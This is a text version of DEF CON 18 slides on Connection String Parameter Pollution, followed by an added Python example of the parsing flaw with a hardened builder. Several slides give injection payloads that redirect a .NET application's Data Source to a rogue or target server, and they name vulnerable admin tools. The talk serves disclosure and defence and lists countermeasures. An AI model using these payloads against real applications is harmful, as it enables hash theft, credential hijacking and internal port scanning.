DEF CON 18 - Alonso-Palazon-String
Chema Alonso
Informática 64
Connection Strings
• Define the way an application connects to a data repository
• There are connection strings for:
– Relational Databases (MSSQL, Oracle, MySQL, …)
– LDAP Directories
– Files
– Etc…
Databases Connection Strings
Data Source = myServerAddress;
Initial Catalog = myDataBase;
User Id = myUsername;
Password = myPassword;
Google Hacking
UDL (Universal Data Links) Files
Credentials
Operating System Accounts:
Data Source = myServerAddress;
Initial Catalog = myDataBase;
User Id = myUsername;
Password = myPassword;
Integrated Security = SSPI/True/Yes;

Database Credentials:
Data Source = myServerAddress;
Initial Catalog = myDataBase;
User Id = myUsername;
Password = myPassword;
Integrated Security = No;
Users authenticated by Web App
Web application manages the login process
1.‐ The web application connects to the database using the credentials in its connection string (a syslogins account).
2.‐ It asks the user for login information.
3.‐ It checks the login information against the info stored in a custom users table (Select id from users).
[Diagram: Database Engine (syslogins, custom users table) and App running on Web Server]


Users authenticated by Database
Database engine manages the login process
1.‐ The web application asks the user for credentials.
2.‐ A connection string is composed with those credentials to connect to the database (a syslogins account).
3.‐ Roles and permissions are limited to those of the user used in the connection string.
[Diagram: Database Engine (syslogins) and App running on Web Server]


Connection String Attacks
• It's possible to inject parameters into connection strings using semicolons as separators
Data Source = myServerAddress;
Initial Catalog = myDataBase;
Integrated Security = NO;
User Id = myUsername;
Password = myPassword; Encryption = Off;
ConnectionStringBuilder
• Available in .NET Framework 2.0
• Builds secure connection strings from parameters
• It's not possible to inject into the connection string
Are people aware of this?
Connection String Parameter Pollution
• The goal is to inject parameters into the connection string, whether they already exist in it or not
• If a parameter is duplicated, the last value wins
• This behavior allows attackers to completely rewrite the connection string, and therefore to manipulate the way the application works and how it authenticates
Pollutionable Behavior
Param1=Value A; Param2=Value B; Param1=Value C; Param2=Value D
[Diagram: DBConnection Object ends up with Param1 = Value C and Param2 = Value D (last value wins)]
What can be done with CSPP?
Rewrite a parameter
Data Source=DB1; UID=sa; password=Pwnd!; Data Source=DB2
[Diagram: DBConnection Object ends up with DataSource = DB2, UID = sa, password = Pwnd!]
Scanning the DMZ
[Diagram: Internet -> FW -> Web app vulnerable to CSPP -> Production Database; the polluted Data Source instead points at Development Database 1, Financial Database, Test Database or a Forgotten Database in the DMZ]
Port Scanning a Server
[Diagram: Internet -> FW -> Web app vulnerable to CSPP -> Production Database / Server; the polluted DataSource takes the values DB1,80 / DB1,21 / DB1,25 / DB1,1445]
What can be done with CSPP?
Add a parameter
Data Source=DB1; UID=sa; password=Pwnd!; Integrated Security=True
[Diagram: DBConnection Object ends up with DataSource, UID, password and the added Integrated Security parameter]
CSPP Attack 1: Hash stealing
1.‐ Run a rogue server on an accessible IP address: Rogue_Server
2.‐ Activate a sniffer to catch the login process: Cain/Wireshark
3.‐ Duplicate the Data Source parameter: Data_Source=Rogue_Server
4.‐ Force Windows Integrated Authentication: Integrated Security=true
CSPP Attack 1: Hash stealing
Original connection string:
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+'User_Value'+; Password=+'Password_Value'+;

Polluted connection string:
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Rogue_Server; Password=;Integrated Security=True;
CSPP 1: ASP.NET Enterprise Manager
CSPP Attack 2: Port Scanning
1.‐ Duplicate the Data Source parameter, setting on it the target server and the target port to be scanned:
Data_Source=Target_Server,target_Port
2.‐ Check the error messages:
‐ No TCP Connection ‐> Port is opened
‐ No SQL Server ‐> Port is closed
‐ SQL Server ‐> Invalid Password
CSPP Attack 2: Port Scanning
Original connection string:
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+'User_Value'+; Password=+'Password_Value'+;

Polluted connection string:
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Target_Server,Target_Port; Password=;Integrated Security=True;
CSPP 2: myLittleAdmin
[Screenshot: Port is Opened]
CSPP 2: myLittleAdmin
[Screenshot: Port is Closed]
CSPP Attack 3: Hijacking Web Credentials
1.‐ Duplicate the Data Source parameter, pointing it to the target SQL Server:
Data_Source=Target_Server
2.‐ Force Windows Authentication:
Integrated Security=true
3.‐ The application pool in which the web app is running will send its credentials in order to log in to the database engine.
CSPP Attack 3: Hijacking Web Credentials
Original connection string:
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+'User_Value'+; Password=+'Password_Value'+;

Polluted connection string:
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Target_Server; Password=;Integrated Security=true;
CSPP Attack 3: Web Data Administrator
CSPP Attack 3: myLittleAdmin/myLittleBackup
CSPP Attack 3: ASP.NET Enterprise Manager
Other Databases
• MySQL
– Does not support integrated security
– It's still possible to manipulate the behavior of the web application:
• Port scanning
• Connect to internal/testing/development databases
• Oracle supports integrated authentication on Windows and UNIX/Linux servers
– It's possible to perform all the described attacks:
• Hash stealing
• Port scanning
• Hijacking web credentials
– It's also possible to elevate a connection to sysdba in order to shutdown/startup an instance
myLittleAdmin/myLittleBackup
myLittleTools released a security advisory and a patch about this

ASP.NET Enterprise Manager
• ASP.NET Enterprise Manager is "abandoned", but it's been used in a lot of web Control Panels.
• Fix the code yourself

ASP.NET Web Data Administrator
ASP.NET Web Data Administrator is secure on the CodePlex web site, but not on the Microsoft web site, where an insecure old version has been published
Countermeasures
• Harden your firewall
– Outbound connections
• Harden your internal accounts
– Web application
– Web server
– Database Engine
• Use ConnectionStringBuilder
• Filter the ;)
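Added example, not code from the talk: a small Python model of the "last value wins" parsing that the Connection String Parameter Pollution slides rely on, with the concatenation pattern from the attack slides beside a hardened builder that applies the "filter the ;" and ConnectionStringBuilder countermeasures. The parser, the keyword set and the polluted password value are assumptions constructed for this example; they mirror the SQL Server keywords shown on the slides.

```python
def parse_connection_string(cs: str) -> dict:
    """Model of an ADO.NET-style parser: 'key=value' pairs split on ';',
    keys compared case-insensitively, and the LAST value of a duplicated
    key wins (the behaviour CSPP exploits)."""
    params = {}
    for part in cs.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            params[key.strip().lower()] = value.strip()
    return params

def find_pollution(cs: str) -> dict:
    """Detection helper: keys that occur more than once, with every value seen,
    suitable for logging before a connection is opened."""
    seen = {}
    for part in cs.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            seen.setdefault(key.strip().lower(), []).append(value.strip())
    return {k: v for k, v in seen.items() if len(v) > 1}

def build_naive(user: str, password: str) -> str:
    """Vulnerable pattern from the slides: raw concatenation of user input."""
    return ("Data source=SQL2005;initial catalog=db1;Integrated Security=no;"
            f"user id={user};Password={password};")

def build_safe(user: str, password: str) -> str:
    """Hardened version: refuse separator characters in any value, then verify
    the result carries no duplicated keys before handing it out."""
    for value in (user, password):
        if ";" in value or "=" in value:
            raise ValueError("separator character in connection string value")
    cs = build_naive(user, password)
    if find_pollution(cs):
        raise ValueError("duplicated parameter in connection string")
    return cs

# Constructed input: the password field carries the payload from the hash-stealing slide.
POLLUTED_PASSWORD = ";Data Source=Rogue_Server;Integrated Security=True"

def demo() -> dict:
    """Effective parameters the naive build produces, plus the duplicated keys."""
    polluted = build_naive("alice", POLLUTED_PASSWORD)
    effective = parse_connection_string(polluted)
    return {"data source": effective["data source"],               # Rogue_Server
            "integrated security": effective["integrated security"],  # True
            "polluted": sorted(find_pollution(polluted))}

if __name__ == "__main__":
    print(demo())
    try:
        build_safe("alice", POLLUTED_PASSWORD)
    except ValueError as err:
        print("rejected:", err)
```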
Questions?
Contact
Chema Alonso
[email protected]
http://www.informatica64.com
http://elladodelmal.blogspot.com
Palako
[email protected]

Authors
Chema Alonso
Manuel Fernández “The Sur”
Alejandro Martín Bailón
Antonio Guzmán
